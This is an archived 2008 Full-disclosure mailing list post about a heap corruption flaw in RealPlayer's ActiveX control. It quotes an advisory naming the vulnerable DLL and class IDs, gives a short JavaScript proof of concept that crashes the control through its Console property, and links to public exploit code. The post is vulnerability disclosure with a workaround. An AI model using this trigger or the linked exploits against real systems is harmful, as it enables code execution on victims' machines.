Re: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/
browser/realplayer_console.rb

Elazar

On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad
<elazar@xxxxxxxxxxxx> wrote:
Who:
Real Networks
http://www.real.com

What:
Real Networks Real Player is a popular media player.

How:
Real Player utilizes an ActiveX control to play content within the
users browser.

rmoc3260.dll version 6.0.10.45
{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}

It is possible to modify heap blocks after they are freed and
overwrite certain registers, possibly allowing code execution.
Like
so:

------------
var buf = '';
while (buf.length < 1005) buf = buf + 'A';

m = obj.Console;
obj.Console = buf;
obj.Console = m

//repeat
m = obj.Console;
obj.Console = buf;
obj.Console = m --> Should crash here
-------------

Workaround:
Set the killbit for this control. See
http://support.microsoft.com/kb/240797

Fix:
No official fix known

Exploit:
Working on it

Elazar

--
Click here for free info on Graduate Degrees.
http://tagline.hushmail.com/fc/Ioyw6h4eSposuNJokZ1ABDCgGd9ckObZCsDzUVQlPhlov4Mrkal8uM/

  • Re: guitarcenter.com vs MF?
    ... the same company but they do compete). ... Guncho would be happy to know that Real Networks has gained about 25% ... Real Player is no longer RNWK's primary source of income. ... Did you or did you not recommend that I DUMP the stock, ...
    (alt.guitar)
  • [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap Corruption
    ... Real Networks Real Player is a popular media player. ... Real Player utilizes an ActiveX control to play content within the ... obj.Console = buf; ...
    (Full-Disclosure)
  • Re: guitarcenter.com vs MF?
    ... I wonder now that they do will they compete against MF or will ... Guncho would be happy to know that Real Networks has gained about 25% ... C'mon Guncho, "dis" Real Networks again, I could use another big bump! ... Real Player is no longer RNWK's primary source of income. ...
    (alt.guitar)